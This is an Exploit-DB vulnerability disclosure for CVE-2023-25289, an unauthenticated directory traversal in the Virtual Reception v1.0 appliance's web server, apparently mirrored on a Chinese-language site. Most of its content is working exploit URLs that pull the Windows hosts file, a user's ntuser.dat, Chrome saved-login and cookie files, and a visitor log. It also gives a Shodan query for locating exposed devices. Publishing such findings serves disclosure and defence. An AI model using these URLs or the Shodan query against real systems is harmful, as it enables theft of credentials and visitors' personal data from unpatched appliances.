Virtual Reception v1.0 – Web Server Directory Traversal

• Exploit Database
• 33 阅读

• 作者： Spinae
  日期： 2023-03-30
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51142/

• # Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal
  # Exploit Author: Spinae
  # Vendor Homepage: https://www.virtualreception.nl/
  # Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY
  # Tested on: all
  # CVE-ID: CVE-2023-25289
  
  We discovered the web server of the Virtual Reception appliance is prone to
  an unauthenticated directory traversal vulnerability. This allows an
  attacker to traverse outside the server root directory by specifying files
  at the end of a URL request.
  This is a NUC5i5RY
  
  http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts
  http://[ip address]/C:/windows/WindowsUpdate.log
  ...
  
  A user called 'receptie' exists on the Windows system:
  
  http://[ip address]/c:/users/receptie/ntuser.dat
  http://[ip address]/c:/users/receptie/ntuser.ini
  http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log
  ...
  http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
  Data/Default/Login Data
  http://[ip
  address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State
  http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
  Data/Default/Cookies
  ...
  
  The appliance also keeps a log of the visitors that register at the
  entrance:
  
  http://[ip address]/visitors.csv
  
  hash icon for shodan searches:
  
  https://www.shodan.io/search?query=http.favicon.hash%3A656388049
  
  No reply from the vendor (phone, email, website form submissions), first
  reported in 2021.
  
  -- 
  DISCLAIMER: Unless indicated otherwise, the information contained in this 
  message is privileged and confidential, and is intended only for the use of 
  the addressee(s) named above and others who have been specifically 
  authorized to receive it. If you are not the intended recipient, you are 
  hereby notified that any dissemination, distribution or copying of this 
  message and/or attachments is strictly prohibited. The company accepts no 
  liability for any damage caused by any virus transmitted by this message. 
  Furthermore, the company does not warrant a proper and complete 
  transmission of this information, nor does it accept liability for any 
  delays. If you have received this message in error, please contact the 
  sender and delete the message. Thank you.